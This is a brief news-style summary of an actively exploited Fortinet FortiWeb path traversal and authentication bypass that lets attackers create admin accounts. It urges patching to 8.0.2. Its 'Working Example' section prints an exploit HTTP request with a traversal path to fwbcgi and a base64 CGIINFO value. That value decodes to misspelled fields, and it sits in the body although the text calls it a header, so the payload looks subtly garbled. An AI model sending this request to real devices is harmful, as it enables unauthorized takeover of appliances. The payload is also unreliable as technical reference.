Now-Patched Fortinet FortiWeb Flaw Exploited in Attacks to Create Admin Accounts

Now-Patched Fortinet FortiWeb Flaw Exploited in Attacks to Create Admin Accounts

Cybersecurity researchers report active exploitation of a Fortinet FortiWeb vulnerability that allows attackers to create admin accounts. The flaw, patched in version 8.0.2, was exploited via a path traversal and authentication bypass to gain full device control.

Why This Matters

The technical reality of cybersecurity is that even patched vulnerabilities remain dangerous if systems are unpatched. This flaw demonstrates how attackers can weaponize combinations of bugs—here, a path traversal and header-based authentication bypass—to bypass security layers. The indiscriminate exploitation suggests widespread compromise of unpatched devices, with potential for persistent access and privilege escalation.

Key Insights

• “Patched in version 8.0.2, the vulnerability allows attackers to perform actions as a privileged user” (watchTowr, 2025)
• “Path traversal and CGIINFO header manipulation bypass authentication” (watchTowr Labs, 2025)
• “watchTowr released an artifact generator tool to identify susceptible devices” (The Hacker News, 2025)

Working Example

POST /api/v2.0/cmdb/system/admin%3F/../../../../../cgi-bin/fwbcgi HTTP/1.1
Host: target-fortiweb.com
Content-Type: application/json
Content-Length: 132

{
  "CGIINFO": "eyJ1c2VybmFtZSI6ImFkbWluIiwicHJvZmZpY2UiOiJwcm9mX2FkbWluIiwidmRvbiI6InJvb3QiLCJsZW5jb2xpbmUiOiJhZG1pbiJ9"
}

Practical Applications

• Use Case: Unpatched FortiWeb appliances used to create persistent admin access by threat actors.
• Pitfall: Delaying patch application leaves systems exposed to account creation and privilege escalation.

References:

• https://thehackernews.com/2025/11/fortinet-fortiweb-flaw-actively.html

---